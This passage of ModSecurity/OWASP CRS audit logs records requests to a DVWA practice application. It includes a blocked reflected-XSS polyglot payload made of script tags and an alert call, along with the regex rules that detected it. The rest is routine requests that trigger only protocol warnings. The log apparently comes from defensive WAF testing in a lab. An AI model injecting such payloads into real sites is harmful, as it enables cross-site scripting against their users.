\"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0lX8AAQEAAAmHBJYAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":585,"p2":3331,"p3":0,"p4":0,"p5":150,"sr":24,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4RwAAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:26:00 GMT","If-None-Match":"\"1a8-54f6a470f3057\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:30:21 GMT","ETag":"\"1d0-54f6a5695262a\"","Accept-Ranges":"bytes","Content-Length":"464","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc0n38AAQEAAAkW4RwAAAAB\"]"],"stopwatch":{"p1":398,"p2":1073,"p3":72,"p4":149,"p5":52,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4R0AAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc0n38AAQEAAAkW4R0AAAAB\"]"],"stopwatch":{"p1":476,"p2":857,"p3":45,"p4":381,"p5":53,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:23 --0400","transaction_id":"WRc0n38AAQEAAAkW4R4AAAAB","remote_address":"127.0.0.1","remote_port":42066,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc0n38AAQEAAAkW4R4AAAAB\"]"],"stopwatch":{"p1":719,"p2":1197,"p3":47,"p4":247,"p5":52,"sr":104,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:45 --0400","transaction_id":"WRc08X8AAQEAAAkYuE8AAAAD","remote_address":"192.168.75.145","remote_port":56790,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1463","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli_blind/\"] [unique_id \"WRc08X8AAQEAAAkYuE8AAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":396,"p2":2261,"p3":105,"p4":538,"p5":135,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:45 --0400","transaction_id":"WRc08X8AAQEAAAkZ0BMAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli_blind/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1463","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli_blind/\"] [unique_id \"WRc08X8AAQEAAAkZ0BMAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":611,"p2":2509,"p3":98,"p4":481,"p5":74,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:46 --0400","transaction_id":"WRc08n8AAQEAAAkZ0BQAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli_blind/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc08n8AAQEAAAkZ0BQAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":632,"p2":2175,"p3":98,"p4":396,"p5":65,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:46 --0400","transaction_id":"WRc08n8AAQEAAAkZ0BUAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli_blind/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc08n8AAQEAAAkZ0BUAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":411,"p2":1609,"p3":128,"p4":420,"p5":95,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
